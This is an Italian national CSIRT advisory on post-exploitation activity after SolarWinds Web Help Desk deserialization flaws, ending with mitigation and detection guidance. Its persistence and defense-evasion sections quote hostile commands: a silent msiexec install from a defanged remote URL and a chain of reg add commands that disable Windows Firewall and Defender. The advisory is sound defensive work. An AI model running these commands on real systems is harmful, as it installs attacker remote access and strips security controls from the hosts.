Sintesi

Ricercatori di sicurezza di Huntress hanno recentemente analizzato attività di post exploitation derivanti dallo sfruttamento delle vulnerabilità CVE-2025-40551 e CVE-2025-26399, che interessano il prodotto SolarWinds Web Help Desk .

Descrizione e potenziali impatti

Ricercatori di sicurezza di Huntress hanno recentemente analizzato attività di post exploitation derivanti dallo sfruttamento delle vulnerabilità CVE-2025-40551 e CVE-2025-26399 – già trattate da questo CSIRT nell’ambito dell’ AL06/260128/CSIRT-ITA e dell’ AL03/250923/CSIRT-ITA – che interessano il prodotto SolarWinds Web Help Desk .

Nel dettaglio la catena d’attacco ha visto il successivo utilizzo di tre applicativi volti a garantire la gestione remota dei dispositivi target: Zoho Meeting, Cloudfare tunnel e Velociraptor . Questi strumenti sono stati utilizzati per garantire l’accesso persistente e la possibilità di effettuare movimenti laterali all’interno delle reti compromesse.

Di seguito si riportano maggiori dettagli in merito all’intera catena di compromissione.

Analisi del vettore iniziale

Il vettore di attacco iniziale consiste nella compromissione del modulo di gestione del Web Help Desk di SolarWinds. Le vulnerabilità, di tipo “ Remote Code Execution”, interessano la classe AjaxProxy e sono dovute alla deserializzazione non corretta di dati non attendibili: l’invio di payload serializzati malevoli all’interno di richieste HTTP opportunamente predisposte, consente a un attaccante remoto e non autenticato di forzare l’esecuzione di codice arbitrario sul server target.

Persistenza

Dopo aver consolidato l’accesso iniziale, gli attaccanti utilizzano il processo java.exe (figlio del servizio WHD wrapper.exe) per istanziare una shell cmd.exe. Tramite questa, viene eseguito MSIEXEC.EXE per il download e l’installazione silenziosa dell’agente Zoho ManageEngine RMM da una risorsa remota.

msiexec /q /i hxxps://[DOMINIO[.][TLD]/[FILE].msi

L’abuso di questo strumento di amministrazione legittimo garantisce agli attaccanti:

• Canale C2 resiliente: mantenimento di una connessione cifrata persistente verso l’infrastruttura dell’attaccante, che si confonde con il normale traffico di gestione IT (traffic masquerading);
• Accesso di livello SYSTEM: esecuzione di script e/o comandi arbitrari con privilegi massimi ereditati dal servizio WHD, senza necessità di interazione utente o ulteriori autenticazioni;
• Evasione dei controlli: elusione delle policy di sicurezza basate sulla reputazione dei processi, dato che l’agente Zoho è un binario firmato e affidabile.

Operativamente, l’impianto viene finalizzato configurando l’agente in modalità Unattended Access e vincolandolo al tenant gestito dall’attaccante, identificato tramite un account ProtonMail ([account]@proton[.]me) Tale configurazione disaccoppia l’infrastruttura di comando, permettendo al traffico C2 di mimetizzarsi interamente nelle comunicazioni legittime verso il cloud del vendor ( Living-off-the-Services ).

Discovery

Sfruttando il processo di esecuzione di Zoho – TOOLSIQ.EXE – gli attaccanti esplorano l’ambiente circostante l’host compromesso, tramite l’esecuzione di query Active Directory come:

net group “domain computer” /do

Collecting

Sfruttando il canale Zoho stabilito, gli attaccanti distribuiscono il tool Velociraptor (v0.73.4) tramite installazione MSI silente. La scelta di questa specifica versione non è casuale: oltre a fungere da strumento di Deep System Reconnaissance (sfruttando le capacità native di interrogazione VQL a livello forense), essa è nota per vulnerabilità di tipo “ Privilege Escalation ” , offrendo vettori secondari (di backup) per mantenere il controllo dei sistemi e/o espandersi.

Operativamente, l’impianto viene utilizzato per mappare l’infrastruttura ed eseguire payload PowerShell offuscati (Base64/UTF-16LE). Per garantire l’esfiltrazione dei dati e la ridondanza del C2, viene contestualmente installato il demone Cloudflare Tunnel ( cloudflared ), prelevato dal repository GitHub ufficiale. Quest’ultimo provvede ad incapsulare il traffico malevolo all’interno di un tunnel HTTPS apparentemente legittimo, rendendo l’attività non rilevabile dai meccanismi di sicurezza perimetrali tradizionali e ai sistemi di ispezione DPI.

Exfiltration

Sfruttando i canali creati precedentemente, gli attaccanti inoltrano le informazioni raccolte verso un’infrastruttura di Log Aggregation , ospitata su Google Cloud Platform (GCP) . I flussi informativi vengono processati in istanze Elastic e centralizzati in una piattaforma SIEM : tale approccio strutturato consente di indicizzare e interrogare le evidenze raccolte con le stesse capacità analitiche di un SOC, ottimizzando la selezione dei target per le fasi successive.

Defense Evation

Dopo circa 100 secondi dall’accesso iniziale si osserva l’esecuzione automatizzata di una catena di comandi REG.EXE volta a disabilitare i controlli di sicurezza mediante la modifica delle voci di registro, tramite i seguenti comandi:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\mpssvc" /v Start /t REG_DWORD /d 4 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOAVProtection /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealTimeMonitoring /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f

C2

L’architettura di Comando e Controllo implementa meccanismi avanzati di Survivability: l’impianto non si limita a verificare la raggiungibilità degli endpoint ( Health Check ), ma supporta l’aggiornamento della configurazione a caldo ( Runtime Config Hot-Swapping ).

Tale capacità consente di variare le liste di domini e/o IP della C2 senza necessità di ridistribuire i binari malevoli. Tale flessibilità garantisce la rotazione dinamica dell’infrastruttura su scala globale, vanificando i tentativi difensivi di Sinkholing o blocco statico degli IP ( IP Blacklisting ), assicurando la persistenza del canale anche in caso di smantellamento parziale dei nodi C2.

Azioni di mitigazione

Gli utenti e le organizzazioni possono far fronte a questa tipologia di attacchi attivando le seguenti misure di mitigazione:

• aggiornare le istanze SolarWinds Web Help Desk alla versione 2026.1 o successiva, che risolve le vulnerabilità CVE-2025-26399, CVE-2025-40536 e CVE-2025-40551;
• non esporre le interfacce amministrative di WHD, che non devono essere accessibili direttamente sulla rete Internet. Proteggere tali interfacce tramite VPN o un firewall;
• reimpostare le password di tutti gli account di servizio, gli account amministrativi e di tutte le credenziali accessibili tramite l’applicazione WHD o memorizzate al suo interno.

Inoltre, è possibile verificare un’eventuale compromissione tramite la verifica degli host WHD per individuare la presenza di:

• strumenti di accesso remoto non autorizzati (Zoho Assist, Velociraptor, Cloudflared, tunnel di VS Code)
• servizi anomali;
• esecuzioni di PowerShell codificate;
• installazioni MSI silenziose avviate dal processo del servizio WHD (java.exe/wrapper.exe).

Infine, si raccomanda di valutare la verifica e l’implementazione degli IoC [1] forniti dai ricercatori di sicurezza tramite il bollettino riportato nella sezione Riferimenti.

[1] Per definizione, non tutti gli indicatori di compromissione sono malevoli. Questo CSIRT non ha alcuna responsabilità per l’attuazione di eventuali azioni proattive (es. inserimento degli IoC in blocklist) relative agli indicatori forniti. Le informazioni contenute in questo documento rappresentano la migliore comprensione della minaccia al momento del rilascio.